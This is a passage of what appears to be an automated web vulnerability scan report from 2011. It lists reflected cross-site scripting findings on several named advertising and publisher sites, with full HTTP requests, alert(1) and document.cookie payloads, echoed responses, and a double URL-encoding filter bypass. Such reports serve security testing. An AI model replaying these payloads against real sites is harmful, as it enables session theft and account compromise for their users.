j1Qv-WE2etJ3E5zq3-LzpOXRPpYMOzqIBD92Zj0fiBVoohuPzb27Y1PwD7woGN0iwFUMB1dsxNV-ffZMPhieLh8wLF-VHhmCpgCBt2RP5NM4jyhWX40nsc53GcUujh5wE0j4RBGoYH5mulVF1K8oQDxkG1cQ0OCxT6sxJ82tx2Cj30WHMohkbcdj8gxrxcSnois1B0ey-njZ4qhrAvk0VTPCzz74eCf2xhjY7maQ8tiy_OXClTFQQejogxaKzXltpQEEAUagcDEygySvANVj-l-i4N5SJqfgyilnbMTg7jurYyyV2jhTgY8gPaBZzRmYBmq6tQ6NrUts2-2BysUlW5jkoXiuxpvsNoaauKgIraAddorlo54FgUCfbmUrBz3pFTu2nm3ESq2goJc1NTbdPXrdeUP6Q1QifSbXGX18rITUd1J8vw0801wJdac8MOJjKfcTgJpm-GmaXaCmU2VxHkGXRDx-yHaA27d32hRPYrUB6O4Pnwzxy1bYzIZ7VcXyyniGIvYRYN1qEHfS6nugBQPiDUozvV5-J_TBpYa45haMGvM5roHDRidNYjU-GgfcXUhDNragxnxBP4bcSA4WEYBdyUFQTofGXQAkzI2ldRuvmpuQQxFEYmAORaIZfYnxWNyrleTk5EU5fKfZ4kdPxAJvZ5JtDBPByEQQqXzxqD9u64bmH2WpMRMmb7w3AqV-qMMZI6Pp98s4YPIN5BUmKi0RluHeEn_ZddQQa4XTfXPIgM1Bl9zEVHf_H2GLHJ4ixiTecT6uwoKCJ5tuF_KkTMTrp8S-7oSq7eWb8IQ5VTa40VIp7jgGh2gTJIu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Tue, 06-Sep-2011 22:19:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 10 Mar 2011 22:19:32 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=6966717148317790486&fpid=de360"><script>alert(1)</script>924b327da15&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

2.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload f72d8<script>alert(1)</script>28031e810f8 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1cf72d8<script>alert(1)</script>28031e810f8&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.rodale.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=NZk5vbu0VxC8JipceOZmBRNQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYRQ5ASb5kMise8Pxt51dGGWc8QDWgjPLhdOG36lSisWrtgLaaSVnj2fdRBcVnCpgzxiiGG36lSisWrtgKQAGh0CtrorNnZzJ6mTbYtlIspvrRHB8bzYus0MO9AJQ9klML90GpK80xK9r5TpCeAipqZpPwjKnistQch1TtSdCipN6mK3CUii1HWejxSM8P3E9CsIyx2KVipBsQrpnSjb2ENNS7GUK75TS3bJ0RsLv7isbmBSYVr2mcVbHisJ6ipYWnnQcsOceLYL7xBRFxKFdLqmZqVuCxNVxR9ESVdFipXOuvVwW11pRw3kybarrhisjKIfUU0elPDSis2guzkT2eqhlmJEDBn8LipG8voHPDPbDLax1KKSKoPv3akGJg07Xisj9z1YKu1NBis8T7j4VRMZDSux1LRdbvQME7fb528daHNJfkisPgGK2RSvdeUD9bvQME7fb520g33buvrQmtDwJR0SvlcgxOZOtWnisXSxxMhQn4sBPBisTo4YEiiYHam60Lr24SUTAXbskI6KiiPUqFH1r2Q7eRaFl39q8flhoInmtRaNDMdjO4e7XqdIDERIqPwhcbmvmZOisnclRRmEpGr0KwjLHYpX4NWnck1gtWcIXXLqdtszoE70KwjLHYpX4F8pJFEZG8Dt2Pkc1sv6c5ZV6jeN2HpSfUPZJTCisdBqSvNMSvaipU6QngPqmaT8Iyp5qkRIUt1qGDVcfhLmRsZN0mIUUYBnO5VrNlR3nLMBjv3TYgoKKSUPXtWXYC4ipisishWx61isSNkyistIItejAyV410ipNN9QFd9eD4PtZiidrsAhJaXIkrSiskUQGs0P7IwouzyiiCDECcwRmCZKPhsh12kQb9NipQisOs69PoecO0ujFerSeGafW9Mjb0uYNPFRdglDYuCjBqWZtThWhSii48NipADZiidrfMyxSuQgpBUmIZW5WzENkGacByoBjycateipx4n7q1sZv9ZvdCtsgTxis7W3iioxZSDipzHisOWeA5uCwcaIYpAt5pDsJsAtM5G1Mknjis1vlkTx9Mqhg0RN2nK5B29oiiex3ln3hiiYfpCN19YGFoLfZOJEe6dtyocipahCisRMEfrisHVpkJTXRisQgr8utIkbiiZtgG8YZLCXSY4OdXcii78AWA1xmxesM97m5CLipH6upZ3ii6GBVV9cmMDJUii4JiiYSisYtVEQGCLaCCXe5U1WipCeXjQ0vk7P79sgiiyscS0iidya7Dj6a6sACrHiilMkLAm3Pyx9JAwisip86B4jYMtEuVaa2xnO7FtuoxNNn62RDkcGtrtYyeC24uHAKNOKgj7hpTdfUw1nL2dz0DyOwplLDwM7yOZZz1TMZ9xwxZjgkKAiiVjp9Ty5ywcAieie; BizoNetworkPartnerIndex=23

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 10 Mar 2011 16:44:30 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (eff06988d5814684997ff16c58dc2e1cf72d8<script>alert(1)</script>28031e810f8)

2.10. http://button.topsy.com/widget/retweet-json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6064a<script>alert(1)</script>69ba86fefe3 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id3-3-1-5-13-23-11-1&url=http%3A%2F%2Fusat.ly%2FgZGKv3&callback=topsyWidgetCallback6064a<script>alert(1)</script>69ba86fefe3 HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5
Content-Length: 540
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 10 Mar 2011 16:46:39 GMT
Last-Modified: Thu, 10 Mar 2011 16:46:34 GMT
Date: Thu, 10 Mar 2011 16:46:34 GMT
Server: lighttpd/1.4.26
X-Cache: MISS from 38.button.topsy.com
X-Cache-Lookup: MISS from 38.button.topsy.com:80
Connection: close

topsyWidgetCallback6064a<script>alert(1)</script>69ba86fefe3({ "html_id": "topsy_id3-3-1-5-13-23-11-1", "url": "http://yourlife.usatoday.com/sex-relationships/story/2011/03/Washington-DC-ranked-top-Twitter-Town-for-its-social-networking/44700538/1", "count": "2
...[SNIP]...

2.11. http://button.topsy.com/widget/retweet-json [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 2ddb4<script>alert(1)</script>1075e4b5c4c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id3-3-1-5-13-23-11-12ddb4<script>alert(1)</script>1075e4b5c4c&url=http%3A%2F%2Fusat.ly%2FgZGKv3&callback=topsyWidgetCallback HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5
Content-Length: 540
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 10 Mar 2011 16:46:37 GMT
Last-Modified: Thu, 10 Mar 2011 16:46:32 GMT
Date: Thu, 10 Mar 2011 16:46:32 GMT
Server: lighttpd/1.4.26
X-Cache: MISS from 21.button.topsy.com
X-Cache-Lookup: MISS from 21.button.topsy.com:80
Connection: close

topsyWidgetCallback({ "html_id": "topsy_id3-3-1-5-13-23-11-12ddb4<script>alert(1)</script>1075e4b5c4c", "url": "http://yourlife.usatoday.com/sex-relationships/story/2011/03/Washington-DC-ranked-top-Twitter-Town-for-its-social-networking/44700538/1", "count": "231", "badge": "1k", "trackback_url": "htt
...[SNIP]...

2.12. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload abac2<script>alert(1)</script>71864f41a7 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAABmSxQc~,497DR8qMzMu1cSa2IHyZJwozOiERaBVX HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=280&flashID=myExperience772399363001&bgcolor=%23FFFFFF&playerID=30292868001&playerKey=AQ~~%2CAAAAABmSxQc~%2C497DR8qMzMu1cSa2IHyZJwozOiERaBVX&isVid=true&dynamicStreaming=true&wmode=opaque&%40videoPlayer=772399363001&autoStart=&debuggerID=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 587

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q078a58ad26175eba8c3cc45a5246eb076e00e84e
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Thu, 10 Mar 2011 16:41:14 GMT
Server:
Content-Length: 4106

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
........eAQ~~,AAAAABmSxQc~,497DR8qMzMu1cSa2IHyZJwozOiERaBVX.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bfz..w ....gvideoPlayerabac2<script>alert(1)</script>71864f41a7.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

2.13. http://ds.addthis.com/red/psi/sites/www.prevention.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.prevention.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a3993<script>alert(1)</script>e17c06a897c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.prevention.com/p.json?callback=_ate.ad.hpra3993<script>alert(1)</script>e17c06a897c&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.prevention.com%2Fcda%2Fhomepage.do%3Fcm_sp%3DNetwork%2520Banner-_-PV-_-Rodale.com&y8zqvf HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh33.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299599890.60|1299599890.1FE|1297806627.66; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 407
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 10 Mar 2011 16:42:07 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 16:42:07 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1299775327.1FE|1299775327.60|1297806627.66; Domain=.addthis.com; Expires=Sat, 09-Mar-2013 02:59:46 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 10 Mar 2011 16:42:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:42:07 GMT
Connection: close

_ate.ad.hpra3993<script>alert(1)</script>e17c06a897c({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d5af32c71c2e1a5","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.prevent
...[SNIP]...

2.14. http://recipes.rodale.com/homepage.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recipes.rodale.com
Path:   /homepage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0ac'-alert(1)-'ac698ac70ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1 HTTP/1.1
Host: recipes.rodale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: URL=http://recipes.rodale.com/Default.aspx; ASP.NET_SessionId=wcjk0ffc5vis5xu3pxtlpyf1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=20
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:44:26 GMT
Last-Modified: Thu, 10 Mar 2011 16:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: URL=http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1; path=/; HttpOnly
Date: Thu, 10 Mar 2011 16:44:05 GMT
Content-Length: 124318


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl01_MasterHead"><t
...[SNIP]...
dfpCat= 'recipes';
var cat = dfpCat;
var dfpKeyword = '';
var siteName = 'rodale';
var dfpTile='1';
var tile = dfpTile;
var useCAS = 'N';
var logInLandingPage= 'http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1';
var logOutLandingPage= 'http://recipes.rodale.com/homepage.aspx?7d0ac'-alert(1)-'ac698ac70ae=1';
</script>
...[SNIP]...

2.15. http://remedies.rodale.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://remedies.rodale.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acab%2522%253balert%25281%2529%252f%252f442e2727d3c was submitted in the REST URL parameter 1. This input was echoed as 8acab";alert(1)//442e2727d3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico8acab%2522%253balert%25281%2529%252f%252f442e2727d3c HTTP/1.1
Host: remedies.rodale.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb632e7b126b35a7bcfbb3451a86cfd7=2qgeu9pbmt1ukaeaeupr9gjg82; HomeRemedies_Gateway_Cookie=1299775124000; has_js=1; RMDCURURL=http://remedies.rodale.com/; cmTPSet=Y; _chartbeat2=2gjgtv7qcf2o20vh

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 16:45:08 GMT
Content-Type: text/html; charset=utf-8
Expires: Thu, 10 Mar 2011 16:45:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:11 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: HomeRemedies_Gateway_Cookie=1299775508000; path=/; domain=remedies.rodale.com
Content-Length: 57090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="utf-8">

<head>
<title>
...[SNIP]...
<script type="text/javascript">
var parentURL = "http://remedies.rodale.com/favicon.ico8acab";alert(1)//442e2727d3c";
var dfpZone = "remedies";
var dfpTopic = "";
var dfpSubTopic = "";
var dfpTile = 1;
var dfpKeyword = "";
var siteName="rodale";
var dfpCat="";
var logInLandingPage = 'http://remedies
...[SNIP]...

2.16. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostCommented [plckElementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryArticlesMostCommented

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de07"%3balert(1)//45359c91e1c was submitted in the plckElementId parameter. This input was echoed as 1de07";alert(1)//45359c91e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryArticlesMostCommented?plckElementId=Summary_Container1de07"%3balert(1)//45359c91e1c&plckCount=5&plckNoCache=1299795821407&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3758
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=o3bmjoejdw0utrmg4ob5ewu1; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=96d1dad1-c7c6-40a8-804b-69792fc4b569; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:25 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:25 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container1de07";alert(1)//45359c91e1c", "<!--Article summary--><div class=\"Summary_Container\">     <div c
...[SNIP]...

2.17. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostRecommended [plckElementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryArticlesMostRecommended

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4262"%3balert(1)//bd0a4fd4022 was submitted in the plckElementId parameter. This input was echoed as e4262";alert(1)//bd0a4fd4022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryArticlesMostRecommended?plckElementId=Summary_Container1e4262"%3balert(1)//bd0a4fd4022&plckCount=5&plckNoCache=1299795821408&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 3619
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=v000esivmb5gi0au5nccfb3k; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=f593341a-07fb-46c7-9fe0-ff4627f59bc0; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:25 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:25 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container1e4262";alert(1)//bd0a4fd4022", "<!--Article summary--><div class=\"Summary_Container\">     <div
...[SNIP]...

2.18. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecent [plckElementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryBlogsRecent

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fef2"%3balert(1)//1d2ed9a1446 was submitted in the plckElementId parameter. This input was echoed as 6fef2";alert(1)//1d2ed9a1446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecent?plckElementId=Summary_Container26fef2"%3balert(1)//1d2ed9a1446&plckCount=3&plckNoCache=1299795821408&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1842843424-1299775204149; PVNCURURL=http://www.prevention.com/cda/categorypage.do?channel=news.voices&category=f47b9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E91b875ad3d2&topic=slideshows

Response

HTTP/1.1 200 OK
Set-Cookie: preventionprod=R3213878906; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1571
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: preventionprod3l3pluckcom
Set-Cookie: ASP.NET_SessionId=jpd031yxfaeoz22wig5osa45; path=/; HttpOnly
Set-Cookie: SiteLifeHost=preventionprod3l3pluckcom; domain=prevention.com; path=/
Set-Cookie: anonId=acea500a-eb36-4c0c-9c0b-f0e4e2babd5f; domain=prevention.com; expires=Fri, 09-Mar-2012 22:23:24 GMT; path=/
Date: Thu, 10 Mar 2011 22:23:24 GMT

document.domain = "prevention.com";

gSiteLife.InnerHtmlWrite("Summary_Container26fef2";alert(1)//1d2ed9a1446", "<!--Blog summary--><div class=\"Summary_Container\"> <table class=\"Summary_BlogTa
...[SNIP]...

2.19. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.prevention.com
Path:   /ver1.0/Summary/SummaryBlogsRecentPosts

Issue detail

The value of the plckElementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de170"%3balert(1)//3c37359584b was submitted in the plckElementId parameter. This input was echoed as de170";alert(1)//3c37359584b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Summary/SummaryBlogsRecentPosts?plckElementId=Summary_Containerde170"%3balert(1)//3c37359584b&plckCount=3&plckTagFilter=UserTier:Featured&plckNoCache=1299795839779&plckApiKey=%24%7BAPIKey%7D HTTP/1.1
Host: sitelife.prevention.com
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
